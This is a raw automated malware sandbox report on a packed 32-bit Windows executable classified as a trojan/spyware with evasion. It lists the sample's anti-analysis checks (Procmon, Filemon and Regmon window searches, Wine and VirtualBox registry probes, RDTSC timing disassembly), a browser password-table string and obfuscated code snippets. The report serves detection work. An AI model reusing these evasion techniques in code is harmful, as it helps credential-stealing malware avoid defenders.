                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00548EDD0_2_00548EDD
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0055CEC40_2_0055CEC4
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005B0EC80_2_005B0EC8
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005E0ECA0_2_005E0ECA
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005A6EFE0_2_005A6EFE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005A0EF30_2_005A0EF3
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0052AE930_2_0052AE93
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005A8E950_2_005A8E95
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00600EB20_2_00600EB2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00588EB90_2_00588EB9
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005F0EBB0_2_005F0EBB
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00526EB70_2_00526EB7
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00592EBF0_2_00592EBF
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00582EB20_2_00582EB2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00598EAF0_2_00598EAF
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004B2EB00_2_004B2EB0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004CAEB00_2_004CAEB0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00524EAC0_2_00524EAC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0064CF750_2_0064CF75
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004C6F520_2_004C6F52
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00516F7D0_2_00516F7D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00606F2A0_2_00606F2A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0063AF3A0_2_0063AF3A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00558F0E0_2_00558F0E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00552FD60_2_00552FD6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00642FE20_2_00642FE2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00602FEC0_2_00602FEC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00546FD90_2_00546FD9
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005B8FCF0_2_005B8FCF
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00594FC10_2_00594FC1
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005FAFC50_2_005FAFC5
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0062AFC60_2_0062AFC6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00572F9D0_2_00572F9D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0058CF920_2_0058CF92
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0056EF980_2_0056EF98
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0054CF850_2_0054CF85
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00618F820_2_00618F82
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005AEFB60_2_005AEFB6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005D2FAD0_2_005D2FAD
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0056AFAA0_2_0056AFAA
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005EB05E0_2_005EB05E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0054505B0_2_0054505B
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005CF0440_2_005CF044
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005E30430_2_005E3043
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005E707F0_2_005E707F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C50770_2_005C5077
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0057901F0_2_0057901F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0053D01A0_2_0053D01A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: String function: 004C4C90 appears 47 times
                Source: Wvo9FU4qo9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Wvo9FU4qo9.exeStatic PE information: Section: ZLIB complexity 0.9995915032679739
                Source: Wvo9FU4qo9.exeStatic PE information: Section: nefrsmja ZLIB complexity 0.9949230393070044
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004E2070 CoCreateInstance,0_2_004E2070
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525599035.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525892000.00000000057CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Wvo9FU4qo9.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile read: C:\Users\user\Desktop\Wvo9FU4qo9.exeJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Wvo9FU4qo9.exeStatic file information: File size 1890304 > 1048576
                Source: Wvo9FU4qo9.exeStatic PE information: Raw size of nefrsmja is bigger than: 0x100000 < 0x1a3600

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeUnpacked PE file: 0.2.Wvo9FU4qo9.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nefrsmja:EW;mbmugyej:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nefrsmja:EW;mbmugyej:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: Wvo9FU4qo9.exeStatic PE information: real checksum: 0x1d7d0f should be: 0x1d062f
                Source: Wvo9FU4qo9.exeStatic PE information: section name:
                Source: Wvo9FU4qo9.exeStatic PE information: section name: .idata
                Source: Wvo9FU4qo9.exeStatic PE information: section name:
                Source: Wvo9FU4qo9.exeStatic PE information: section name: nefrsmja
                Source: Wvo9FU4qo9.exeStatic PE information: section name: mbmugyej
                Source: Wvo9FU4qo9.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_3_00F7AC5B push 741874C0h; ret 0_3_00F7AFE2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_3_00F7C20D push eax; ret 0_3_00F7C345
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00509934 push 581A58E5h; mov dword ptr [esp], eax0_2_00509A21
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_00509934 push ebx; mov dword ptr [esp], edx0_2_00509A25
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0050C052 push 2023EA52h; mov dword ptr [esp], eax0_2_0050CFEF
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0076E078 push edx; mov dword ptr [esp], eax0_2_0076E0A1
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0076E078 push ebx; mov dword ptr [esp], 0033A938h0_2_0076E0AB
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006B6051 push eax; mov dword ptr [esp], ecx0_2_006B6073
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0075601D push 75437422h; mov dword ptr [esp], edx0_2_0075673A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C0022 push ebp; mov dword ptr [esp], 48DB05EBh0_2_005C0445
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C0022 push ecx; mov dword ptr [esp], edi0_2_005C0478
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C0022 push ebx; mov dword ptr [esp], eax0_2_005C04F1
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C0022 push esi; mov dword ptr [esp], eax0_2_005C04F8
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C0022 push edx; mov dword ptr [esp], esi0_2_005C04FC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C0022 push edx; mov dword ptr [esp], esi0_2_005C050C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C0022 push eax; mov dword ptr [esp], ebx0_2_005C054E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0050A0EA push 72061FF3h; mov dword ptr [esp], eax0_2_0050A0EF
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_007240A8 push 7A5AC158h; mov dword ptr [esp], esi0_2_007240E3
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_007240A8 push esi; mov dword ptr [esp], 5DFD1002h0_2_0072410F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_007240A8 push eax; mov dword ptr [esp], edx0_2_007241B6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0050E14F push eax; mov dword ptr [esp], edx0_2_0050E168
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push 6C7508E7h; mov dword ptr [esp], edi0_2_0067412E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push 199882CAh; mov dword ptr [esp], edx0_2_00674141
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push ecx; mov dword ptr [esp], 4F7DE119h0_2_00674156
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push 0554C3BAh; mov dword ptr [esp], ebx0_2_00674189
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push ebp; mov dword ptr [esp], edi0_2_00674193
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push 5A1B7219h; mov dword ptr [esp], edi0_2_0067422F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push edi; mov dword ptr [esp], esi0_2_0067423B
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push ebp; mov dword ptr [esp], edx0_2_00674274
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push ebx; mov dword ptr [esp], 7BFC1E32h0_2_006742AD
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C push 038A0E3Dh; mov dword ptr [esp], edx0_2_00674300
                Source: Wvo9FU4qo9.exeStatic PE information: section name: entropy: 7.982349711059476
                Source: Wvo9FU4qo9.exeStatic PE information: section name: nefrsmja entropy: 7.954783069172778

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 5090A7 second address: 508A29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3331238822h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007F333123881Fh 0x00000017 mov dword ptr [ebp+122D2231h], esi 0x0000001d push dword ptr [ebp+122D0D5Dh] 0x00000023 clc 0x00000024 clc 0x00000025 call dword ptr [ebp+122D1933h] 0x0000002b pushad 0x0000002c jno 00007F333123881Ch 0x00000032 xor eax, eax 0x00000034 mov dword ptr [ebp+122D2B78h], ebx 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e jmp 00007F3331238825h 0x00000043 mov dword ptr [ebp+122D37BEh], eax 0x00000049 pushad 0x0000004a mov dx, 21D2h 0x0000004e mov eax, dword ptr [ebp+122D3676h] 0x00000054 popad 0x00000055 mov esi, 0000003Ch 0x0000005a mov dword ptr [ebp+122D2B78h], ecx 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jmp 00007F3331238828h 0x00000069 lodsw 0x0000006b mov dword ptr [ebp+122D2B78h], edx 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 clc 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2B78h], ebx 0x00000080 nop 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F3331238824h 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 508A29 second address: 508A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F333124C7D6h 0x00000009 jo 00007F333124C7D6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F333124C7E7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6873DE second address: 6873E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6873E2 second address: 6873F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F333124C7D6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6873F2 second address: 687406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3331238818h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 687406 second address: 68740C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 68740C second address: 687410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 68635A second address: 6863B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F333124C7E5h 0x0000000a push esi 0x0000000b jnp 00007F333124C7D6h 0x00000011 jmp 00007F333124C7E4h 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F333124C7E6h 0x00000021 jno 00007F333124C7D6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6863B1 second address: 6863D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jnc 00007F3331238816h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6863D0 second address: 6863D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 68650F second address: 686515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 686515 second address: 686519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 686519 second address: 68653C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F333123882Bh 0x0000000e jmp 00007F3331238825h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 686ACA second address: 686AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 686AD2 second address: 686AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3331238828h 0x0000000e jmp 00007F333123881Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 688D63 second address: 688D9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e jmp 00007F333124C7DEh 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 688D9C second address: 688DA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 688DA2 second address: 688DC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 688DC5 second address: 508A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov di, ax 0x0000000b push dword ptr [ebp+122D0D5Dh] 0x00000011 mov di, bx 0x00000014 call dword ptr [ebp+122D1933h] 0x0000001a pushad 0x0000001b jno 00007F333123881Ch 0x00000021 xor eax, eax 0x00000023 mov dword ptr [ebp+122D2B78h], ebx 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d jmp 00007F3331238825h 0x00000032 mov dword ptr [ebp+122D37BEh], eax 0x00000038 pushad 0x00000039 mov dx, 21D2h 0x0000003d mov eax, dword ptr [ebp+122D3676h] 0x00000043 popad 0x00000044 mov esi, 0000003Ch 0x00000049 mov dword ptr [ebp+122D2B78h], ecx 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 jmp 00007F3331238828h 0x00000058 lodsw 0x0000005a mov dword ptr [ebp+122D2B78h], edx 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 clc 0x00000065 mov ebx, dword ptr [esp+24h] 0x00000069 mov dword ptr [ebp+122D2B78h], ebx 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F3331238824h 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 688E4E second address: 688F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xor dword ptr [esp], 7269F0E5h 0x0000000d push ebx 0x0000000e jmp 00007F333124C7E9h 0x00000013 pop ecx 0x00000014 mov dword ptr [ebp+122D214Ch], edx 0x0000001a push 00000003h 0x0000001c jmp 00007F333124C7DEh 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D2057h], edi 0x00000029 push 00000003h 0x0000002b or edi, 3F62A8B6h 0x00000031 push A106EC69h 0x00000036 pushad 0x00000037 jmp 00007F333124C7E3h 0x0000003c jmp 00007F333124C7E6h 0x00000041 popad 0x00000042 xor dword ptr [esp], 6106EC69h 0x00000049 movsx edi, di 0x0000004c lea ebx, dword ptr [ebp+12453CB7h] 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007F333124C7D8h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 00000015h 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c jmp 00007F333124C7E6h 0x00000071 push eax 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 688FCF second address: 688FDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F3331238816h 0x0000000e rdtsc
